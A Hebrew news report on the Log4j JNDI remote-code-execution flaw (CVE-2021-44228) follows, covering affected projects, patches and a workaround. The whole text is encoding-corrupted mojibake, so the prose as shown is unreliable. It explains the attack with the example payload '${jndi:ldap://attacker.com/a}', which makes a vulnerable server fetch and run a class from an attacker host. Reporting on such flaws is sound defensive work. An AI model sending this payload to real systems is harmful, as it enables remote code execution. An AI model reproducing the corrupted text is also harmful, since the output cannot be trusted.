ืคื’ื™ืขื•ืช ืงื˜ืกื˜ืจื•ืคืœื™ืช ื‘- Apache Log4j ื”ืžืฉืคื™ืขื” ืขืœ ืคืจื•ื™ืงื˜ื™ื ืจื‘ื™ื ืฉืœ Java

ื‘-Apache Log4j, ืžืกื’ืจืช ืคื•ืคื•ืœืจื™ืช ืœืืจื’ื•ืŸ ืจื™ืฉื•ื ื‘ืืคืœื™ืงืฆื™ื•ืช Java, ื–ื•ื”ืชื” ืคื’ื™ืขื•ืช ืงืจื™ื˜ื™ืช ื”ืžืืคืฉืจืช ื‘ื™ืฆื•ืข ืงื•ื“ ืฉืจื™ืจื•ืชื™ ื›ืืฉืจ ืขืจืš ื‘ืคื•ืจืžื˜ ืžื™ื•ื—ื“ ื‘ืคื•ืจืžื˜ "{jndi:URL}" ื ื›ืชื‘ ืœื™ื•ืžืŸ. ื”ื”ืชืงืคื” ื™ื›ื•ืœื” ืœื”ืชื‘ืฆืข ืขืœ ื™ื™ืฉื•ืžื™ Java ืฉืžืชืขื“ื™ื ืขืจื›ื™ื ืฉื”ืชืงื‘ืœื• ืžืžืงื•ืจื•ืช ื—ื™ืฆื•ื ื™ื™ื, ืœืžืฉืœ, ื‘ืขืช ื”ืฆื’ืช ืขืจื›ื™ื ื‘ืขื™ื™ืชื™ื™ื ื‘ื”ื•ื“ืขื•ืช ืฉื’ื™ืื”.

ื™ืฆื•ื™ืŸ ืฉื›ืžืขื˜ ื›ืœ ื”ืคืจื•ื™ืงื˜ื™ื ื”ืžืฉืชืžืฉื™ื ื‘ืžืกื’ืจื•ืช ื›ื’ื•ืŸ Apache Struts, Apache Solr, Apache Druid ืื• Apache Flink ืžื•ืฉืคืขื™ื ืžื”ื‘ืขื™ื”, ื›ื•ืœืœ Steam, Apple iCloud, ืœืงื•ื—ื•ืช ื•ืฉืจืชื™ื ืฉืœ Minecraft. ืฆืคื•ื™ ืฉื”ืคื’ื™ืขื•ืช ืขืœื•ืœื” ืœื”ื•ื‘ื™ืœ ืœื’ืœ ืฉืœ ื”ืชืงืคื•ืช ืžืกื™ื‘ื™ื•ืช ืขืœ ืืคืœื™ืงืฆื™ื•ืช ืืจื’ื•ื ื™ื•ืช, ื”ื—ื•ื–ืจื•ืช ืขืœ ื”ื”ื™ืกื˜ื•ืจื™ื” ืฉืœ ืคื’ื™ืขื•ื™ื•ืช ืงืจื™ื˜ื™ื•ืช ื‘ืžืกื’ืจืช Apache Struts, ืฉืœืคื™ ื”ืขืจื›ื” ื’ืกื” ืžืฉืžืฉืช ื‘ื™ื™ืฉื•ืžื™ ืื™ื ื˜ืจื ื˜ ืขืœ ื™ื“ื™ 65% ืž-Fortune 100 ื—ื‘ืจื•ืช.ื›ื•ืœืœ ื ื™ืกื™ื•ื ื•ืช ืœืกืจื•ืง ืืช ื”ืจืฉืช ืœืื™ืชื•ืจ ืžืขืจื›ื•ืช ืคื’ื™ืขื•ืช.

ื”ื‘ืขื™ื” ืžื—ืžื™ืจื” ื‘ืฉืœ ื”ืขื•ื‘ื“ื” ืฉื›ื‘ืจ ืคื•ืจืกื ื ื™ืฆื•ืœ ืขื•ื‘ื“, ืืš ืขื“ื™ื™ืŸ ืœื ื”ื™ื“ื•ืจ ืชื™ืงื•ื ื™ื ืœืขื ืคื™ื ื”ื™ืฆื™ื‘ื™ื. ืžื–ื”ื” CVE ืขื“ื™ื™ืŸ ืœื ื”ื•ืงืฆื”. ื”ืชื™ืงื•ืŸ ื›ืœื•ืœ ืจืง ื‘ืขื ืฃ ื”ื‘ื“ื™ืงื” log4j-2.15.0-rc1. ื›ืคืชืจื•ืŸ ืขื•ืงืฃ ืœื—ืกื™ืžืช ื”ืคื’ื™ืขื•ืช, ืžื•ืžืœืฅ ืœื”ื’ื“ื™ืจ ืืช ื”ืคืจืžื˜ืจ log4j2.formatMsgNoLookups ืœ-true.

ื”ื‘ืขื™ื” ื ื’ืจืžื” ืžื”ืขื•ื‘ื“ื” ืฉ-log4j ืชื•ืžืš ื‘ืขื™ื‘ื•ื“ ืžืกื™ื›ื•ืช ืžื™ื•ื—ื“ื•ืช "{}" ื‘ืคืœื˜ ืฉื•ืจื•ืช ืœื™ื•ืžืŸ, ืฉื‘ื”ืŸ ื ื™ืชืŸ ื”ื™ื” ืœื‘ืฆืข ืฉืื™ืœืชื•ืช JNDI (Java Naming and Directory Interface). ื”ืžืชืงืคื” ืžืกืชื›ืžืช ื‘ื”ืขื‘ืจืช ืžื—ืจื•ื–ืช ืขื ื”ื”ื—ืœืคื” "${jndi:ldap://attacker.com/a}", ื‘ืขื™ื‘ื•ื“ ืืฉืจ log4j ื™ืฉืœื— ื‘ืงืฉืช LDAP ืขื‘ื•ืจ ื”ื ืชื™ื‘ ืœืžื—ืœืงืช Java ืœืฉืจืช attacker.com . ื”ื ืชื™ื‘ ื”ืžื•ื—ื–ืจ ืขืœ ื™ื“ื™ ื”ืฉืจืช ืฉืœ ื”ืชื•ืงืฃ (ืœื“ื•ื’ืžื”, http://second-stage.attacker.com/Exploit.class) ื™ื™ื˜ืขืŸ ื•ื™ืชื‘ืฆืข ื‘ื”ืงืฉืจ ืฉืœ ื”ืชื”ืœื™ืš ื”ื ื•ื›ื—ื™, ืžื” ืฉืžืืคืฉืจ ืœืชื•ืงืฃ ืœื‘ืฆืข ืงื•ื“ ืฉืจื™ืจื•ืชื™ ื‘- ืžืขืจื›ืช ืขื ื”ื–ื›ื•ื™ื•ืช ืฉืœ ื”ืืคืœื™ืงืฆื™ื” ื”ื ื•ื›ื—ื™ืช.

ืชื•ืกืคืช 1: ืœืคื’ื™ืขื•ืช ื”ื•ืงืฆื” ื”ืžื–ื”ื” CVE-2021-44228.

ืชื•ืกืคืช 2: ื–ื•ื”ืชื” ื“ืจืš ืœืขืงื•ืฃ ืืช ื”ื”ื’ื ื” ืฉื ื•ืกืคื” ืขืœ ื™ื“ื™ ืฉื—ืจื•ืจ log4j-2.15.0-rc1. ืขื“ื›ื•ืŸ ื—ื“ืฉ, log4j-2.15.0-rc2, ื”ื•ืฆืข ืขื ื”ื’ื ื” ืžืœืื” ื™ื•ืชืจ ืžืคื ื™ ื”ืคื’ื™ืขื•ืช. ื”ืงื•ื“ ืžื“ื’ื™ืฉ ืืช ื”ืฉื™ื ื•ื™ ื”ืงืฉื•ืจ ืœื”ื™ืขื“ืจ ืกื™ื•ื ื—ืจื™ื’ ื‘ืžืงืจื” ืฉืœ ืฉื™ืžื•ืฉ ื‘-URL JNDI ื‘ืคื•ืจืžื˜ ืฉื’ื•ื™.

ืžืงื•ืจ: OpenNet.ru

ื”ื•ืกืคืช ืชื’ื•ื‘ื”